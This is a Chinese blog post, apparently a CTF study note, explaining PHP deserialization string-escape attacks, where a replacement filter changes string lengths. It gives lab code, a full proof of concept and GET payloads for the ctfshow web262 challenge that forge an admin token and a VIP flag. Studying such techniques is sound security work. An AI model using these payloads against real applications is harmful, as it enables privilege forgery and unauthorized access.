php反序列化字符串逃逸学习

最新推荐文章于 2024-05-07 12:17:50 发布
最新推荐文章于 2024-05-07 12:17:50 发布
阅读量334 收藏 2
点赞数
分类专栏: Web安全 CTF php 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46270220/article/details/118935407
版权
CTF 同时被 3 个专栏收录
21 篇文章 1 订阅
订阅专栏
Web安全
6 篇文章 4 订阅
订阅专栏
php
4 篇文章 0 订阅
订阅专栏

文章目录

前言

最近在刷ctfshow的web入门反序列化题目时,正好遇到了字符串逃逸的问题,就跟着群主的讲解视频和网上大佬的文章来学习一下。

反序列化特点

PHP 在反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾(字符串除外),并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。

看如下代码:

<?php
class a{
	public $a = "shyshy";
	public $b = "nb666";
}

$x = new a();
echo serialize($x); 
//结果为 O:1:"a":2:{s:1:"a";s:6:"shyshy";s:1:"b";s:5:"nb666";}

echo '<br>';
$y = 'O:1:"a":2:{s:1:"a";s:6:"shyshy";s:1:"b";s:5:"nb666";}';
var_dump(unserialize($y));

最后反序列化的结果为
请添加图片描述
因为是根据长度来判断内容,所以会在长度符合后的第一个}结束

$y = 'O:1:"a":2:{s:1:"a";s:6:"shyshy";s:1:"b";s:5:"nb666";}6";}';
var_dump(unserialize($y));

请添加图片描述

当字符串和前面的长度不对应时,就会报错

$y = 'O:1:"a":2:{s:1:"a";s:6:"shyshy";s:1:"b";s:6:"nb666";}'; // 长度改为6
var_dump(unserialize($y));

请添加图片描述

反序列化字符串逃逸

下面开始逃逸,能够逃逸的特点一般是题目中都有替换函数,将一些关键词替换成为另一个词,从而造成字符串的长度增加减少,而php总是先进行序列化操作,再去替换字符串。

逃逸后字符串变长

看下面的代码

<?php
class user{
	public $username;
	public $password;
	public $isVIP;

	public function __construct($u,$p){
		$this->username=$u;
		$this->password=$p;
		$this->isVIP=0;
	}
}

function filter($s){
	return str_replace('admin','hacker',$s);
}
$u = new user('admin','123456');
echo serialize($u);

输出为O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}
用过滤函数后

$us = filter($u_seri);
echo $us;

O:4:"user":3:{s:8:"username";s:5:"hacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}
两者对比,发现admin已经被替换成hacker,但是字符串长度没有变,还是5,这就逃逸出来了一个字符。
现在想要将isVIP的值改为1,首先,可以将admin的值改为admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;},这样可以使得在反序列化时,到这里就成功闭合,从而舍弃后面的字符串。
请添加图片描述
但是因为admin变长,前面的长度却还显示的是原来的,这就导致运行后会报错。这时就要借助过滤函数让字符串变长的作用。(刚刚添加的字符串长度为47)
过滤函数每次替换后,都会让字符串字母+1,也就是需要47个admin来填充

$u = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}','123456');
$u_seri = serialize($u);
$us = filter($u_seri);
echo $us;

输出结果:

O:4:"user":3:{s:8:"username";s:282:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}

验证一下长度
请添加图片描述
再来看最后结果
请添加图片描述
发现成功的让isVIP变成了1

web262 wp

再看一道反序列化导致字符串变长的题,是CTFshow web入门的web262

<?php
error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

highlight_file(__FILE__);

这里会把字符串中的fuck替换为loveU,多出来一个字符。
题目中给的提示,还有一个message.php

<?php
highlight_file(__FILE__);
include('flag.php');

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_COOKIE['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}

开始分析

<?php
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
	}
}

function filter($msg){
	return str_replace('fuck','loveU',$msg);
}

$msg = new message('1','1','fuck');

$msg_1 = serialize($msg);

echo $msg_1;
//O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"1";s:2:"to";s:4:"fuck";s:5:"token";s:4:"user";}

上面是在函数过滤前,下面是函数过滤后

$msg_2 = filter($msg_1);
echo $msg_2;
//O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"1";s:2:"to";s:4:"loveU";s:5:"token";s:4:"user";}

可以看到逃逸出一个字符。那么这题就是要把类中$token的值由user换成admin,按照上面的例子

";s:5:"token";s:5:"admin";}

请添加图片描述
可以看到字符串的长度是27,也就是要27个fuck

完整poc:

<?php
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
	}
}

function filter($msg){
	return str_replace('fuck','loveU',$msg);
}

$msg = new message('1','1','fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}');

$msg_1 = serialize($msg);


$msg_2 = filter($msg_1);
echo $msg_2;

验证一下,发现逃逸成功,token=admin
请添加图片描述
payload:

?f=1&m=1&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}

然后访问message.php获取flag

逃逸后字符串变短

写一个简单的代码

<?php
highlight_file(__FILE__);
class web{
	public $username;
	public $password;
	public $isvip = '0';

	public function __construct($u,$p){
		$this->username = $u;
		$this->password = $p;
	}
}

$username = $_GET[u];
$password = $_GET[p];

function filter($msg){
	return str_replace('shy','',$msg);
}

$msg = new web($username,$password);

$msg_1 = serialize($msg);
echo $msg_1;
echo '<br>';
echo '<br>';

$msg_2 = filter($msg_1);
echo $msg_2;
echo '<br>';
echo '<br>';

$msg_3 = unserialize($msg_2);
var_dump($msg_3);

目的是让isvip的值由0变为1。在输入普通字符后,结果正常
请添加图片描述
在输入一个shy后,被置换为空,同时逃逸出三个字符
请添加图片描述
那么想要让isvip的值为1,就要构造如下字符串

"s:5:"isvip";s:1:"1";}

长度为22,先输入一个shy让反序列化不正常
请添加图片描述
那么红框框起来的就变为username的值,那么可以让这中间的";s:8:"password";s:29:"123456全部变成username的值,再自己添加一个password,使变量的数量保持为3,就可以造成逃逸。
请添加图片描述
由于长度是29,无法整除3,所以改成1234567,此时长度为30,共需要10个shy,吃掉30个字符。然后添加";s:8:"password";s:6:"123456作为password序列化的内容。
如下图,可以看到成功的把isvip的值变为1
请添加图片描述

payload:

?u=shyshyshyshyshyshyshyshyshyshy&p=1234567";s:8:"password";s:6:"123456";s:5:"isvip";s:1:"1";}
Lum1n0us
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
21-4 PHP反序列化漏洞-字符串逃逸
weixin_43263566的博客
01-19 364
是在序列化字符串之后追加任意字符串,这样不会影响反序列化的进行。通过修改序列化字符串中的敏感字符,可以绕过一些安全检查和限制,从而实现字符串逃逸字符串逃逸(闭合)是一种在反序列化函数可控的情况下,通过修改序列化字符串中的敏感字符来达到字符串逃逸的方法。函数不会修改原始字符串,而是返回一个新的字符串,因此需要将返回值赋值给一个变量来保存替换后的结果。具体而言,可以通过修改变量名等个数,使得序列化字符串中的字符个数与实际变量值个数不一致。也必须是一个数组,且数组元素的个数必须相同。字符串,并将其替换为。
浅析php反序列化字符串逃逸
Lemon's blog
08-26 3050
前言: php反序列化字符串逃逸之前没有详细的学习过,所以遇到题目看的有点懵,这次好好学习一下。 反序列化的特点 首先要了解一下反序列化的一些特点: php反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾,并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。 class A{ public $name='shy'; public $pass='123456'; } $lemon = new A(); echo serialize
PHP反序列化字符串逃逸
v2ish1yan的博客
04-15 1704
php反序列化字符串逃逸
php反序列化字符逃逸
leekos的博客,分享web安全相关知识~
01-04 1206
php反序列化字符逃逸
2024年网络安全最新php反序列化学习字符串逃逸(1),【面试必备
最新发布
2401_84297618的博客
05-07 669
s:60:” 读取为name的值,后面的序列化字符串就会逃逸出去,不被当作字符串来读取,而是被成功反序列化,修改info**构造闭合,然后让php反序列化我们设计好的序列化字符串,从而修改变量,尝试把info的值赋值为上面红框里的序列化字符串,那为什么不跟变长的类型一样,直接把序列化字符串跟在name的值后面呢?如果跟在name后面,由于name的长度本身就很长,过滤后name的值变短了,我们的序列化字符串就会被读取为name的值(逃不出去),就无法发挥它的作用了,所以要把info的值设为序列化字符串
ctfshow代码审计
遇事不决冲冲冲
08-27 3314
web301 直接把源码下载下来 $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=$result->fetch_array(MYSQLI_BOTH); if($result->num_rows<1){ $_SESSION['error']="1"; header("
php反序列化学习字符串逃逸(1),2024年最新农民工看完都学会了
2401_83973943的博客
04-13 671
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
浅谈PHP反序列化字符逃逸
lonmar的博客
12-13 764
本文目录前言0x01 序列化和反序列化serialize()unserialize()0x02 字符逃逸字符变多字符减少总结 前言 最近遇到了这个知识点,网上找了好几篇这方面的好像都不太仔细,自己来总结下 0x01 序列化和反序列化 serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字 如下面的: <?php class people{ public $nam
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
PHP反序列化长度变化尾部字符串逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
php反序列化逃逸1
08-03
}结束,后的字符串不影响正常的反序列化php反序列化逃逸知识点 - 属性逃逸般在数据先经过次 serialize 再经过 unserialize,在这个中间反序
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
php反序列化实例详解之字符串逃逸
wboy_的博客
05-06 276
本篇文章给大家带来了关于PHP的相关知识,其中主要介绍了关于反序列化的相关问题,PHP反序列化字符串逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少,下面一起看一下,希望对大家有帮助。
php反序列化--字符串逃逸
YkingH的博客
03-14 5080
php反序列化字符串逃逸 PHP反序列化字符串逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少(本篇文章默认已有反序列化相关知识基础) 过滤后字符串变多 以ctfshow-web262为例讲解: error_reporting(0); class message{ public $from; public $msg; public $to; public $token='user'; public function __construct(
ctf.show WEB入门-代码审计
~airrudder~
11-30 4352
ctfshow 代码审计篇 web301-web310
[CTF]CTFSHOW反序列化
Sapphire037的博客
01-20 3766
265 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # @Last Modified by: h1xa # @Last Modified time: 2020-12-05 00:17:08 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); include('flag.php');
PHP序列化,反序列化
kuzemax的博客
08-07 854
反序列化常用于上层语言构造特定调用链的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。
php反序列化字符串逃逸
m0_52920608的博客
07-17 82
php反序列化字符串逃逸
PHP反序列化
e111111111128的博客
08-06 96
1序列化与反序列化:序列化是将对象转换为可存储或传输的格式(通常是字符串),反序列化则是将序列化的数据重新转换为对象。在PHP中,可以使用serialize()函数将对象序列化,使用 unserialize()函数进行反序列化PHP序列化和反序列化是将PHP对象转换为字符串以便存储或传输,并将字符串转换回PHP对象的过程。当应用程序接收到用户提供的序列化数据并进行反序列化时,如果未对数据进行充分验证和过滤,攻击者可以构造恶意的序列化数据,并通过恶意代码执行任意的操作。PHP序列化与反序列化
fastjson反序列化字符串数组
03-03
下面是一个示例代码,演示了如何使用Fastjson反序列化字符串数组: ```java import com.alibaba.fastjson.JSON; public class Main { public static void main(String[] args) { String jsonString = "[\"string...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lum1n0us

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值